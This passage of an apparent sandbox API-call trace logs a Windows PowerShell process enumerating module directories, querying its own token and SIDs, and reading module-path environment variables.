	[0058.793] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x184c18b240 | out: lpFindFileData=0x184c18b240) returned 0x1505fc884f0
	[0058.795] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.797] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\*", lpFindFileData=0x184c18b2a0 | out: lpFindFileData=0x184c18b2a0) returned 0x1505fc884f0
	[0058.799] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.803] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.805] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b2f0 | out: lpFindFileData=0x184c18b2f0) returned 0
	[0058.808] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\*", lpFindFileData=0x184c18b240 | out: lpFindFileData=0x184c18b240) returned 0x1505fc87ad0
	[0058.810] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\*", lpFindFileData=0x184c18b2a0 | out: lpFindFileData=0x184c18b2a0) returned 0x1505fc884f0
	[0058.816] FindClose (in: hFindFile=0x1505fc87950 | out: hFindFile=0x1505fc87950) returned 1
	[0058.821] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdd630
	[0058.821] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbdd630 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.821] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.821] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18b3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.821] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.821] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18b928 | out: TokenHandle=0x184c18b928*=0x8fc) returned 1
	[0058.821] GetTokenInformation (in: TokenHandle=0x8fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18ba28 | out: TokenInformation=0x0, ReturnLength=0x184c18ba28) returned 0
	[0058.821] GetTokenInformation (in: TokenHandle=0x8fc, TokenInformationClass=0x1, TokenInformation=0x1505fc9ace0, TokenInformationLength=0x2c, ReturnLength=0x184c18ba28 | out: TokenInformation=0x1505fc9ace0, ReturnLength=0x184c18ba28) returned 1
	[0058.821] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047604060, cbSid=0x184c18ba20 | out: pSid=0x15047604060*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18ba20) returned 1
	[0058.822] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18b8c0*=0x900, lpdwindex=0x184c18b694 | out: lpdwindex=0x184c18b694) returned 0x0
	[0058.822] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18b340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.823] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdaff0
	[0058.823] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbdaff0 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.823] CoTaskMemFree (pv=0x1505fbdaff0) 
	[0058.823] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18b270, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.825] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdc970
	[0058.825] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbdc970 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.826] CoTaskMemFree (pv=0x1505fbdc970) 
	[0058.826] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18b210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.829] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbda110
	[0058.829] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbda110 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.829] CoTaskMemFree (pv=0x1505fbda110) 
	[0058.829] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.829] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9010
	[0058.829] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbd9010, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x0
	[0058.829] CoTaskMemFree (pv=0x1505fbd9010) 
	[0058.829] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdaff0
	[0058.829] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbdaff0 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.829] CoTaskMemFree (pv=0x1505fbdaff0) 
	[0058.829] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.829] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.829] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18d318 | out: TokenHandle=0x184c18d318*=0x904) returned 1
	[0058.829] GetTokenInformation (in: TokenHandle=0x904, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18d418 | out: TokenInformation=0x0, ReturnLength=0x184c18d418) returned 0
	[0058.829] GetTokenInformation (in: TokenHandle=0x904, TokenInformationClass=0x1, TokenInformation=0x1505fc9aca0, TokenInformationLength=0x2c, ReturnLength=0x184c18d418 | out: TokenInformation=0x1505fc9aca0, ReturnLength=0x184c18d418) returned 1
	[0058.829] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1504762abe0, cbSid=0x184c18d410 | out: pSid=0x1504762abe0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18d410) returned 1
	[0058.829] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18d2b0*=0x908, lpdwindex=0x184c18d084 | out: lpdwindex=0x184c18d084) returned 0x0
	[0058.830] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.830] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.830] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18d448 | out: TokenHandle=0x184c18d448*=0x90c) returned 1
	[0058.830] GetTokenInformation (in: TokenHandle=0x90c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18d548 | out: TokenInformation=0x0, ReturnLength=0x184c18d548) returned 0
	[0058.830] GetTokenInformation (in: TokenHandle=0x90c, TokenInformationClass=0x1, TokenInformation=0x1505fc9b1a0, TokenInformationLength=0x2c, ReturnLength=0x184c18d548 | out: TokenInformation=0x1505fc9b1a0, ReturnLength=0x184c18d548) returned 1
	[0058.830] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047639be8, cbSid=0x184c18d540 | out: pSid=0x15047639be8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18d540) returned 1
	[0058.830] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18d3e0*=0x910, lpdwindex=0x184c18d1b4 | out: lpdwindex=0x184c18d1b4) returned 0x0
	[0058.831] CoTaskMemAlloc (cb=0x218) returned 0x1505fbda330
	[0058.831] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbda330, nSize=0x10a | out: lpBuffer="\xf562\x46fe\x150") returned 0x0
	[0058.831] CoTaskMemFree (pv=0x1505fbda330) 
	[0058.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x184c18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77
	[0058.831] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd9010
	[0058.831] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbd9010 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.831] CoTaskMemFree (pv=0x1505fbd9010) 
	[0058.831] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.832] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd7f10
	[0058.832] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbd7f10 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.832] CoTaskMemFree (pv=0x1505fbd7f10) 
	[0058.832] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.835] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18dab0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18dab0*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x62, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0058.835] SetEvent (hEvent=0x8e4) returned 1
	[0058.835] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18dc70*=0x8e4, lpdwindex=0x184c18da44 | out: lpdwindex=0x184c18da44) returned 0x0
	[0058.835] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.835] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18def8 | out: TokenHandle=0x184c18def8*=0x914) returned 1
	[0058.835] GetTokenInformation (in: TokenHandle=0x914, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18dff8 | out: TokenInformation=0x0, ReturnLength=0x184c18dff8) returned 0
	[0058.835] GetTokenInformation (in: TokenHandle=0x914, TokenInformationClass=0x1, TokenInformation=0x1505fc9b4e0, TokenInformationLength=0x2c, ReturnLength=0x184c18dff8 | out: TokenInformation=0x1505fc9b4e0, ReturnLength=0x184c18dff8) returned 1
	[0058.836] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047661540, cbSid=0x184c18dff0 | out: pSid=0x15047661540*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18dff0) returned 1
	[0058.836] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18de90*=0x918, lpdwindex=0x184c18dc64 | out: lpdwindex=0x184c18dc64) returned 0x0
	[0058.836] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.836] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd7f10
	[0058.836] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbd7f10, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.837] CoTaskMemFree (pv=0x1505fbd7f10) 
	[0058.837] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbda110
	[0058.837] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbda110 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.837] CoTaskMemFree (pv=0x1505fbda110) 
	[0058.837] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.837] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.837] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18def8 | out: TokenHandle=0x184c18def8*=0x91c) returned 1
	[0058.837] GetTokenInformation (in: TokenHandle=0x91c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18dff8 | out: TokenInformation=0x0, ReturnLength=0x184c18dff8) returned 0
	[0058.837] GetTokenInformation (in: TokenHandle=0x91c, TokenInformationClass=0x1, TokenInformation=0x1505fc9ac60, TokenInformationLength=0x2c, ReturnLength=0x184c18dff8 | out: TokenInformation=0x1505fc9ac60, ReturnLength=0x184c18dff8) returned 1
	[0058.837] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047674af0, cbSid=0x184c18dff0 | out: pSid=0x15047674af0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18dff0) returned 1
	[0058.837] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18de90*=0x920, lpdwindex=0x184c18dc64 | out: lpdwindex=0x184c18dc64) returned 0x0
	[0058.837] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd6150
	[0058.837] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbd6150, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.837] CoTaskMemFree (pv=0x1505fbd6150) 
	[0058.837] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18db60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0058.837] CoCreateGuid (in: pguid=0x184c18e008 | out: pguid=0x184c18e008*(Data1=0x41d68b2b, Data2=0x9335, Data3=0x45bc, Data4=([0]=0x97, [1]=0x7b, [2]=0x9a, [3]=0xae, [4]=0x98, [5]=0xd, [6]=0xcd, [7]=0x28))) returned 0x0
	[0058.837] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x924
	[0058.838] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0058.839] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18db68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18db68*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x66, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0058.839] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18da70*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18da70*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x62, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0058.839] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18db48*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x66, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18db48*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x66, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0058.840] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdb430
	[0058.840] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbdb430, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0058.840] CoTaskMemFree (pv=0x1505fbdb430) 
	[0058.840] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0058.841] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules")) returned 0xffffffff
	[0058.842] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.842] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd6150
	[0058.842] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbd6150, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0058.842] CoTaskMemFree (pv=0x1505fbd6150) 
	[0058.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0058.844] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.844] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.844] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.844] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.844] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.845] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.845] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 0
	[0058.845] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.854] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.854] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.854] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.854] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.854] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.854] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 0
	[0058.854] FindClose (in: hFindFile=0x1505fc88730 | out: hFindFile=0x1505fc88730) returned 1
	[0058.855] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.855] FindClose (in: hFindFile=0x1505fc87950 | out: hFindFile=0x1505fc87950) returned 1
	[0058.856] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.876] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1
	[0058.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d
	[0058.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\", lpFilePart=0x0) returned 0x3e
	[0058.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.877] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1")) returned 0x20
	[0058.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40
	[0058.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41
	[0058.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40
	[0058.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41
	[0058.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40
